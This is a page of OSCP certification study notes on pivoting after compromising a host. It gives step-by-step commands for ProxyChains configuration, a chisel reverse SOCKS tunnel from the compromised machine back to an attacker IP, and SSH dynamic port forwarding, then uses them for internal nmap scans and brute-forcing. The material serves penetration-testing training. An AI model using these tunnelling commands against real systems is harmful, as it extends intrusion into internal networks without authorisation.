🐝
OSCP 2022 Materials
  • General
    • Whoami
    • Resources
    • Frequently Asked Questions
    • Shared Resource
  • Enumeration
    • Foreword
    • FTP
    • SMTP
    • DNS
    • Finger
    • HTTP/ HTTPS
      • Login Attacks
        • PHP Logins
      • XSS
      • LFI ( LFI -> RCE )
      • RFI ( RFI -> RCE )
      • CMS Exploitation
        • Wordpress
        • Magento
        • Bludit
        • Tomcat
        • Drupal
      • PHPMyAdmin
    • Kerberos
    • POP3
    • SMB
    • IMAP
    • SNMP
    • IRC
    • RSync
    • MSSQL
    • NFS
    • REDIS
    • Port Forwarding
  • Linux Post Exploitation
    • Post Exploit Checks
    • Pivoting ( ProxyChains )
  • Windows Post Exploitation
    • Post Exploit Checks
    • Active Directory ( Recon -> PE)
    • Notes
      • Powershell
      • Commands
  • Buffer Overflow
    • Hackthebox
    • TryHackMe
  • Mobile Pentesting
    • Android Pentesting
      • Lab TroubleShoot
      • Root Detection Bypass ( Manual )
      • Physical Device
  • MISC
    • Useful
    • Web
    • Linux
    • Application Specific
    • Programming Notes for Offensive Security
      • Python
    • Forensics
      • Disk Forensics
    • Inspection
    • Troubleshooting
      • Mouse Flickering
Powered by GitBook
On this page
  • Exploitation
  • Chisel
  • SSH

Was this helpful?

  1. Linux Post Exploitation

Pivoting ( ProxyChains )

PreviousPost Exploit ChecksNextPost Exploit Checks

Last updated 2 years ago

Was this helpful?

Pivoting lets the attacker access the services/machines the compromised machines connected to.

Pivoting allows the attacker to enlarge the attack surface by performing actions as the network-connected machine

Tools Required:

  • ProxyChains

sudo apt install proxychains
  • SSH / CHISEL

NEED: With proxychains tools which are not available in the compromised machine can be used from the attaker machine (eg: medusa etc..,)

kali -> proxychains -> compromised_machine -> request for accessing from internal_machine -> internal_machine:80

Exploitation

  • After installing proxychains in the attackers machine

  • Configure the port that will be used by the proxychains with its protocol being SOCK Proxy

sudo vi /etc/proxychains.conf

# comment the last line 9050 --> used by TOR
# add the following
# socks5 127.0.0.1 <some port>
socks5 127.0.0.1 9051
  • Perform Dynamic port forwarding

Chisel

  • When SSH Password is not available, make use of chisel to perform

  • Start a chisel server on the attacker machine

# attacker IP: 192.168.1.1
# syntax: ./chisel server -p {port} --reverse
./chisel server -p 1337 --reverse
  • On the compromised machine connect to the attackers reverse connection

# syntax: chisel client {attacker IP}:{port on chisel server} R:socks
./chisel client 192.168.1.1:1337 R:socks # on a debian based machine
chisel.exe client 192.168.1.1:1337 R:socks # on a windows machine
  • Once the connection is made successfully from the compromised machine to the attackers machine, the chisel on the attackers machine will show the port the chisel is connected to

2021/01/15 17:11:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
  • By default chisel will connect on port 1080, so lets change the configuration in the proxychains to perform actions on this port (1080)

sudo vi /etc/proxychains.conf

# comment the last line 9050 --> used by TOR
# add the following
socks5 127.0.0.1 1080
  • Now we can execute commands with proxychains

proxychains nmap -p- internalIp

SSH

  • Perform Dynamic Port Forwarding

ssh -D 9051 charix@10.10.10.84 # 9051 is the port configured in proxychains.conf file
  • Once the connection initializes, an attacker can use proxychains to leverage the attack surface

  • Legend

    • 1 - Added the port 9051 in the /etc/proxychains config file

    • 2 - Inspecting the port activity of 9051 in attackers machine

    • 3 - Dynamic port forwarding to the port configured in proxychains -D 9051

    • 4 - Activity on the port 9051 in attakcers machine

    • 5 - Grabbing banner of the service running on port 25 in the compromised machine

    • 6 - Using proxy chains to obtain the banner of the service on port 25 in the compromised machine

Bruteforces / Automated attack tools can be used with proxychains

Image by VickieLi
Proxychains with chisel
Legend
Proxychains with SSH